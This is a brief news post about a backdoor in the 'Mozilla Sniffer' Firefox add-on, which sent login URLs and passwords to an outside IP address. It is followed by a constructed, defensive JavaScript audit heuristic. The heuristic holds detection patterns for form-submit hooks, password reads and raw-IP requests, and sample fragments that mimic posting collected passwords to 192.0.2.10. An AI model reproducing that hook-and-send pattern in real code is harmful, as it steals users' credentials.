Firefox security test add-on contains backdoor

Kinda ironic that a security add-on for Firefox contained a backdoor that leaked confidential information to an unknown third party.

However, using the Mozilla Sniffer add-on would have introduced an unexpected vulnerability in any application being tested — whenever a login form was submitted, the add-on secretly sent a copy of the URL, password and other details to an IP address presumably controlled by the malicious author.

The backdoor was uncovered by Mozilla user Johann-Peter Hartmann of SektionEins who was using the add-on to test the security of a friend's online game.

This was a pretty serious issue. The Mozilla Sniffer add-on overwrote some of the original Tamper Data files and added a new script that injected a new function, which was called whenever a form was submitted by the browser. The function looked for any forms that had non-empty password fields and then used two other functions to send the data to the third party, presumably a fraudster.

Oooops.
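
A reviewer's heuristic for the behaviour described above, as an added example that is not code from the add-on, Mozilla, or SektionEins: it flags an add-on package whose scripts together hook form submission, read password fields, and send a request to a hard-coded IP address. The file names, sample fragments, and the 192.0.2.10 address are constructed for illustration.

```javascript
// Added example: heuristic audit of add-on script sources (not Mozilla's review tooling).
// Each signal is one of the behaviours the article attributes to the backdoor.
const SIGNALS = {
  submitHook: /addEventListener\(\s*["']submit["']|\.onsubmit\s*=/,
  passwordRead: /type\s*={2,3}\s*["']password["']|input\[type=["']?password/,
  // Outbound request whose destination is a hard-coded IPv4 literal.
  rawIpRequest: /(?:\.open\(|fetch\(|\.src\s*=)[^;\n]*https?:\/\/\d{1,3}(?:\.\d{1,3}){3}/,
};

// files: { "path/in/addon.js": "source text", ... }
function auditAddon(files) {
  const hits = {};
  for (const [path, src] of Object.entries(files)) {
    for (const [name, re] of Object.entries(SIGNALS)) {
      if (re.test(src)) (hits[name] = hits[name] || []).push(path);
    }
  }
  const missing = Object.keys(SIGNALS).filter((n) => !hits[n]);
  // The reported backdoor split the work across functions, so the verdict is
  // taken over the whole package rather than per file.
  return { suspicious: missing.length === 0, hits, missing };
}

// Constructed sample fragments (not code from the actual add-on).
const flaggedAddon = {
  "content/overlay.js": 'window.addEventListener("submit", onFormSubmit, true);',
  "content/forms.js": 'if (el.type == "password" && el.value) collect(form);',
  "content/net.js": 'req.open("POST", "http://192.0.2.10/log", true);',
};
const cleanAddon = {
  "content/overlay.js": 'window.addEventListener("load", init, false);',
  "content/net.js": 'req.open("GET", "https://updates.example.org/v1", true);',
};

// Returns the audit result for both constructed packages.
function demo() {
  return [auditAddon(flaggedAddon), auditAddon(cleanAddon)];
}
```

A hit is a prompt for manual review of the listed files, not proof of a backdoor; legitimate form tools can trip one or two signals, which is why all three are required.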
